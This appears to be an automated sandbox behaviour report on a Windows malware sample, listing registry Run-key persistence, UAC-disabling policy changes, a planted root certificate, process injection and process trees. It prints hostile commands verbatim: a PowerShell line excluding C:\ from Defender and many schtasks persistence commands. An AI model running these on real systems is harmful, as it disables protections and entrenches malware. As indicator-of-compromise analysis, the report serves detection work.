"\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\MSOCache\\All Users\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Default\\Favorites\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Default\\Favorites\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Defender\\fr-FR\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\spoolsv.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Admin\\NetHood\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Defender\\en-US\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\wininit.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\All Users\\Adobe\\Acrobat\\9.0\\csrss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Defender\\en-US\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files (x86)\\Microsoft Sync Framework\\v1.0\\Runtime\\x86\\resources\\dwm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-00A1-0409-0000-0000000FF1CE}-C\\lsm.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\winlogon.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\explorer.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Recovery\\96702242-0d98-11ef-bfa8-5aba25856535\\winlogon.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Public\\Downloads\\smss.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Users\\Public\\services.exe\"" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe -
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exeservices.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" services.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe -
Drops file in Program Files directory 12 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exedescription ioc process File created C:\Program Files (x86)\Windows Defender\fr-FR\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File created C:\Program Files (x86)\Windows Defender\fr-FR\c5b4cb5e9653cc 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File created C:\Program Files (x86)\Windows Defender\en-US\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\RCX25EE.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\RCX3FDF.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\6cb0b6c459d5d3 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File created C:\Program Files (x86)\Windows Defender\en-US\c5b4cb5e9653cc 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\RCX27F2.tmp 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\services.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe File created C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 54 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2480 schtasks.exe 316 schtasks.exe 1472 schtasks.exe 2032 schtasks.exe 1924 schtasks.exe 1864 schtasks.exe 1512 schtasks.exe 2800 schtasks.exe 3032 schtasks.exe 3048 schtasks.exe 616 schtasks.exe 2680 schtasks.exe 624 schtasks.exe 1784 schtasks.exe 444 schtasks.exe 2908 schtasks.exe 2756 schtasks.exe 2220 schtasks.exe 2772 schtasks.exe 2372 schtasks.exe 2108 schtasks.exe 2996 schtasks.exe 3008 schtasks.exe 1992 schtasks.exe 2308 schtasks.exe 2508 schtasks.exe 2440 schtasks.exe 2000 schtasks.exe 236 schtasks.exe 2520 schtasks.exe 940 schtasks.exe 2380 schtasks.exe 2320 schtasks.exe 660 schtasks.exe 1740 schtasks.exe 1640 schtasks.exe 1696 schtasks.exe 1844 schtasks.exe 1716 schtasks.exe 1552 schtasks.exe 2352 schtasks.exe 888 schtasks.exe 1624 schtasks.exe 2796 schtasks.exe 1060 schtasks.exe 944 schtasks.exe 1848 schtasks.exe 2052 schtasks.exe 2960 schtasks.exe 2284 schtasks.exe 2896 schtasks.exe 2840 schtasks.exe 348 schtasks.exe 832 schtasks.exe -
Processes:
services.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 services.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 services.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exepowershell.exeservices.exepid process 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe 2472 powershell.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe 900 services.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exepowershell.exeservices.exedescription pid process Token: SeDebugPrivilege 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 900 services.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.execmd.exedescription pid process target process PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe PID 2392 wrote to memory of 2472 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe powershell.exe PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe PID 2392 wrote to memory of 2200 2392 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe cmd.exe PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe PID 2200 wrote to memory of 2204 2200 cmd.exe w32tm.exe PID 2200 wrote to memory of 900 2200 cmd.exe services.exe PID 2200 wrote to memory of 900 2200 cmd.exe services.exe PID 2200 wrote to memory of 900 2200 cmd.exe services.exe -
System policy modification 1 TTPs 6 IoCs
Processes:
8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exeservices.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" services.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" services.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe"C:\Users\Admin\AppData\Local\Temp\8cdae0ef9f7f5ab79ec5671644e1a0f0_NeikiAnalytics.exe"1⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1gqmGK9flh.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:23⤵PID:2204
-
-
C:\Program Files (x86)\Windows Defender\en-US\services.exe"C:\Program Files (x86)\Windows Defender\en-US\services.exe"3⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:900
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Downloads\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2508
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2908
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2284
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:616
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2756
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:348
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\96702242-0d98-11ef-bfa8-5aba25856535\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\Default\Favorites\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:316
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\Favorites\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1552
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Favorites\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
